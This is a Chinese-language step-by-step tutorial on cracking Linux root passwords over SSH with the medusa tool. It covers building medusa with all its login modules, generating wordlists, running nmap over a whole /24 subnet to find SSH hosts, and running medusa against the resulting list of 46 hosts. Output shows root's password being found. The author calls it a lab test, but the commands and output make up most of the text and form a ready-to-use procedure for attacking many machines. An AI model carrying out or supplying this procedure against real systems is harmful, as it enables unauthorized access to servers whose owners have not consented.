############################################################
#暴力破解linux超级管理员root帐号密码medusa使用方法整理:
#
#By:nortorm
#
###########################################################
#准备工作:(下载下面软件)
   1 wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz
   2 wget http://www.libssh2.org/download/libssh2-1.2.6.tar.gz
   3 字典库的问题(此处用mkpasswd举例)

#正文:
首先安装libssh2-1.2.6.tar.gz
   tar -zxvf libssh2-1.2.6.tar.gz -C /usr/src/
   cd /usr/src/libssh2-1.2.6/
   ./configure ; make ; make install

接着安装medusa-2.0.tar.gz
   tar -zxvf medusa-2.0.tar.gz -C /usr/src/
   cd /usr/src/medusa-2.0/
   ./configure --prefix=$HOME/medusa-2.0 --enable-debug=yes --enable-module-afp=yes --enable-module-cvs=yes --enable-module-ftp=yes --enable-module-http=yes --enable-module-imap=yes --enable-module-mssql=yes --enable-module-mysql=yes --enable-module-ncp=yes --enable-module-nntp=yes --enable-module-pcanywhere=yes --enable-module-pop3=yes --enable-module-postgres=yes --enable-module-rexec=yes --enable-module-rlogin=yes --enable-module-rsh=yes --enable-module-smbnt=yes --enable-module-smtp=yes --enable-module-smtp-vrfy=yes --enable-module-snmp=yes --enable-module-ssh=yes --enable-module-svn=yes --enable-module-telnet=yes --enable-module-vmauthd=yes --enable-module-vnc=yes --enable-module-wrapper=yes --enable-module-web-form=yes
   make ; make install

#字典库 (此处是针对密码特别复杂的情况讨论的,我这里做实验用不到这么复杂。)
[root@www ~]# cat mkpasswd.sh
#!/bin/bash

touch /windows/mkpasswd.txt                      --此处表示在/windows目录下创建mkpasswd.txt文件

for i in `seq 1 10000`;                          --此处表示循环产生10000个密码

do

   mkpasswd -l 8 >>/windows/mkpasswd.txt    --此处表示生成密码重定向到mkpasswd.txt

done

下面来简单介绍一下常用的参数含义:(man mkpasswd)
[root@www ~]# mkpasswd
oO@0thWi8
[root@www ~]# mkpasswd -l 8
d63tL(aT
[root@www ~]# mkpasswd -l 8 -d 3
8:nnV76W
[root@www ~]# mkpasswd -l 8 -c 2
STm[zj30
[root@www ~]# mkpasswd -l 8 -s 2
Nus8}\6E
[root@www ~]# mkpasswd -l 8 -s 2 -c 2 -C 2
e&{HN26d


usage: mkpasswd [args] [user]

where arguments are:

-l #      (length of password, default = 9)          指定密码的长度,默认是9位数

-d #      (min # of digits, default = 2)             指定密码中数字最少位数,默认是2位

-c #      (min # of lowercase chars, default = 2)    指定密码中小写字母最少位数,默认是2位

-C #      (min # of uppercase chars, default = 2)    指定密码中大写字母最少位数,默认是2位

-s #      (min # of special chars, default = 1)      指定密码中特殊字符最少位数,默认是1位

-v        (verbose, show passwd interaction)         显示软件版本


#软件使用步骤:

[root@www ~]# medusa
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
 -h [TEXT]       : Target hostname or IP address
 -H [FILE]         : File containing target hostnames or IP addresses
 -u [TEXT]       : Username to test
 -U [FILE]         : File containing usernames to test
 -p [TEXT]       : Password to test
 -P [FILE]         : File containing passwords to test
 -C [FILE]        : File containing combo entries. See README for more information.
 -O [FILE]        : File to append log information to
 -e [n/s/ns]     : Additional password checks ([n] No Password, [s] Password = Username)
 -M [TEXT]     : Name of the module to execute (without the .mod extension)
 -m [TEXT]     : Parameter to pass to the module. This can be passed multiple times with a
                        different parameter each time and they will all be sent to the module (i.e.
                       -m Param1 -m Param2, etc.)
 -d                  : Dump all known modules
 -n [NUM]      : Use for non-default TCP port number
 -s                   : Enable SSL
 -g [NUM]      : Give up after trying to connect for NUM seconds (default 3)
 -r [NUM]       : Sleep NUM seconds between retry attempts (default 3)
 -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
 -c [NUM]      : Time to wait in usec to verify socket is available (default 500 usec).
 -t [NUM]      : Total number of logins to be tested concurrently
 -T [NUM]     : Total number of hosts to be tested concurrently
 -L                : Parallelize logins using one username per thread. The default is to process
                    the entire username before proceeding.
 -f                 : Stop scanning host after first valid username/password found.
 -F                : Stop audit after first valid username/password found on any host.
 -b                : Suppress startup banner
 -q                : Display module's usage information
 -v [NUM]     : Verbose level [0 - 6 (more)]
 -w [NUM]     : Error debug level [0 - 10 (more)]
 -V           : Display version
 -Z [TEXT]    : Resume scan based on map of previous scan

这些显示的一些参数使用信息。

[root@www ~]# medusa -d
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 Available modules in "." :

 Available modules in "/usr/local/lib/medusa/modules" :
   + afp.mod : Brute force module for AFP sessions : version 2.0 (No usable LIBAFPFS. Module disabled.)
   + cvs.mod : Brute force module for CVS sessions : version 2.0
   + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
   + http.mod : Brute force module for HTTP : version 2.0
   + imap.mod : Brute force module for IMAP sessions : version 2.0
   + mssql.mod : Brute force module for M$-SQL sessions : version 2.0
   + mysql.mod : Brute force module for MySQL sessions : version 2.0
   + ncp.mod : Brute force module for NCP sessions : version 2.0 (No usable LIBNCP. Module disabled.)
   + nntp.mod : Brute force module for NNTP sessions : version 2.0
   + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
   + pop3.mod : Brute force module for POP3 sessions : version 2.0
   + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0 (No usable LIBPQ. Module disabled.)
   + rexec.mod : Brute force module for REXEC sessions : version 2.0
   + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
   + rsh.mod : Brute force module for RSH sessions : version 2.0
   + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
   + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
   + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
   + snmp.mod : Brute force module for SNMP Community Strings : version 2.1
   + ssh.mod : Brute force module for SSH v2 sessions : version 2.0                               --关键是这个模块要加载成功,才能做我们的实验
   + svn.mod : Brute force module for Subversion sessions : version 2.0 (No usable LIBSVN. Module disabled.)
   + telnet.mod : Brute force module for telnet sessions : version 2.0
   + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
   + vnc.mod : Brute force module for VNC sessions : version 2.1
   + web-form.mod : Brute force module for web forms : version 2.1
   + wrapper.mod : Generic Wrapper Module : version 2.0

这些信息显示medusa加载成功的协议模块。

下面开始分析我们需要的主机IP

[root@www ~]# nmap -sV -p22 -oG ssh 172.16.2.0/24  

扫描172.16.2.0/24整个段开了22端口的机器,并且判断服务版本,保存到ssh文件中。


需要用到nmap工具,nmap用到的几个参数概析:
usage:nmap

-sV  服务版本

-p22 表示22号端口

-oG  表示将输出结果保存到


[root@www ~]# cat ssh
# Nmap 5.51 scan initiated Tue Dec  3 17:09:29 2013 as: nmap -sV -p22 -oG ssh 172.16.2.0/24
Host: 172.16.2.1 ()    Status: Up
Host: 172.16.2.1 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.2 ()    Status: Up
Host: 172.16.2.2 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.3 ()    Status: Up
Host: 172.16.2.3 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.8 ()    Status: Up
Host: 172.16.2.8 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.9 ()    Status: Up
Host: 172.16.2.9 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.13 ()    Status: Up
Host: 172.16.2.13 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.17 ()    Status: Up
Host: 172.16.2.17 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.23 ()    Status: Up
Host: 172.16.2.23 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.25 ()    Status: Up
Host: 172.16.2.25 ()    Ports: 22/open/tcp//ssh//Dropbear sshd 2012.55 (protocol 2.0)/
Host: 172.16.2.27 ()    Status: Up
Host: 172.16.2.27 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.31 ()    Status: Up
Host: 172.16.2.31 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.34 ()    Status: Up
Host: 172.16.2.34 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.35 ()    Status: Up
Host: 172.16.2.35 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.39 ()    Status: Up
Host: 172.16.2.39 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.58 ()    Status: Up
Host: 172.16.2.58 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.61 ()    Status: Up
Host: 172.16.2.61 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.64 ()    Status: Up
Host: 172.16.2.64 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.66 ()    Status: Up
Host: 172.16.2.66 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.80 ()    Status: Up
Host: 172.16.2.80 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.95 ()    Status: Up
Host: 172.16.2.95 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.119 ()    Status: Up
Host: 172.16.2.119 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.120 ()    Status: Up
Host: 172.16.2.120 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.121 ()    Status: Up
Host: 172.16.2.121 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.122 ()    Status: Up
Host: 172.16.2.122 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.128 ()    Status: Up
Host: 172.16.2.128 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.132 ()    Status: Up
Host: 172.16.2.132 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.133 ()    Status: Up
Host: 172.16.2.133 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.134 ()    Status: Up
Host: 172.16.2.134 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.135 ()    Status: Up
Host: 172.16.2.135 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.137 ()    Status: Up
Host: 172.16.2.137 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.138 ()    Status: Up
Host: 172.16.2.138 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.139 ()    Status: Up
Host: 172.16.2.139 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.144 ()    Status: Up
Host: 172.16.2.144 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.147 ()    Status: Up
Host: 172.16.2.147 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.150 ()    Status: Up
Host: 172.16.2.150 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.151 ()    Status: Up
Host: 172.16.2.151 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.165 ()    Status: Up
Host: 172.16.2.165 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.166 ()    Status: Up
Host: 172.16.2.166 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.170 (www.nortorm.com)    Status: Up
Host: 172.16.2.170 (www.nortorm.com)    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.177 ()    Status: Up
Host: 172.16.2.177 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.179 ()    Status: Up
Host: 172.16.2.179 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.181 ()    Status: Up
Host: 172.16.2.181 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.194 ()    Status: Up
Host: 172.16.2.194 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.196 ()    Status: Up
Host: 172.16.2.196 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.197 ()    Status: Up
Host: 172.16.2.197 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.200 ()    Status: Up
Host: 172.16.2.200 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.201 ()    Status: Up
Host: 172.16.2.201 ()    Ports: 22/filtered/tcp//ssh///
Host: 172.16.2.203 ()    Status: Up
Host: 172.16.2.203 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.211 ()    Status: Up
Host: 172.16.2.211 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.218 ()    Status: Up
Host: 172.16.2.218 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.220 ()    Status: Up
Host: 172.16.2.220 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.222 ()    Status: Up
Host: 172.16.2.222 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.227 ()    Status: Up
Host: 172.16.2.227 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.228 ()    Status: Up
Host: 172.16.2.228 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.229 ()    Status: Up
Host: 172.16.2.229 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.237 ()    Status: Up
Host: 172.16.2.237 ()    Ports: 22/closed/tcp//ssh///
Host: 172.16.2.240 ()    Status: Up
Host: 172.16.2.240 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.241 ()    Status: Up
Host: 172.16.2.241 ()    Ports: 22/open/tcp//ssh//OpenSSH 5.3 (protocol 2.0)/
Host: 172.16.2.245 ()    Status: Up
Host: 172.16.2.245 ()    Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/
Host: 172.16.2.247 ()    Status: Up
Host: 172.16.2.247 ()    Ports: 22/filtered/tcp//ssh///
# Nmap done at Tue Dec  3 17:10:03 2013 -- 256 IP addresses (60 hosts up) scanned in 34.17 seconds

将上面信息的IP提取出来进行整理到ssh1.txt

[root@www ~]# grep 22/open ssh |awk '{print $2}' >>ssh1.txt


[root@www ~]# cat ssh1.txt
172.16.2.1
172.16.2.3
172.16.2.8
172.16.2.9
172.16.2.17
172.16.2.25
172.16.2.27
172.16.2.31
172.16.2.34
172.16.2.35
172.16.2.58
172.16.2.61
172.16.2.66
172.16.2.80
172.16.2.95
172.16.2.119
172.16.2.120
172.16.2.121
172.16.2.122
172.16.2.128
172.16.2.132
172.16.2.134
172.16.2.135
172.16.2.137
172.16.2.139
172.16.2.144
172.16.2.151
172.16.2.165
172.16.2.166
172.16.2.170
172.16.2.179
172.16.2.181
172.16.2.194
172.16.2.196
172.16.2.197
172.16.2.203
172.16.2.211
172.16.2.218
172.16.2.220
172.16.2.222
172.16.2.227
172.16.2.228
172.16.2.229
172.16.2.240
172.16.2.241
172.16.2.245

下面我自己手动创建一个密码字典(你可以自己去网上找更加好的字典。)以脚本的方式运行
vim mkpasswd.sh

#!/bin/bash
#
#测试字典
#
touch passwd.txt
echo $RANDOM >>passwd.txt   --$RANDOM 产生随机数重定向到passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo 123456 >>passwd.txt    --此处是我自己的真实密码,实验环境*0*。
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt
echo $RANDOM >>passwd.txt

chmod +x mkpasswd.sh
./mkpasswd.sh

会自动生成我的测试字典 passwd.txt

[root@www ~]# vim passwd.txt
[root@www ~]# vim mkpasswd.sh
[root@www ~]# chmod +x mkpasswd.sh
[root@www ~]# ./mkpasswd.sh
[root@www ~]# cat passwd.txt
3652
16777
10723
3963
25439
123456
29718
25915
1151
20323
9717




&&下面开始最重要的环节,密码破解:

[root@www ~]# medusa -H ssh1.txt -u root -P passwd.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3652 (1 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 16777 (2 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 10723 (3 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 3963 (4 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 25439 (5 of 11 complete)
ACCOUNT CHECK: [ssh] Host: 172.16.2.170 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123456 (6 of 11 complete)
ACCOUNT FOUND: [ssh] Host: 172.16.2.170 User: root Password: 123456 [SUCCESS] --此处表示破解成功

当然这个过程是很慢的... 跟你的机器,网络,字典条目等等都有关系。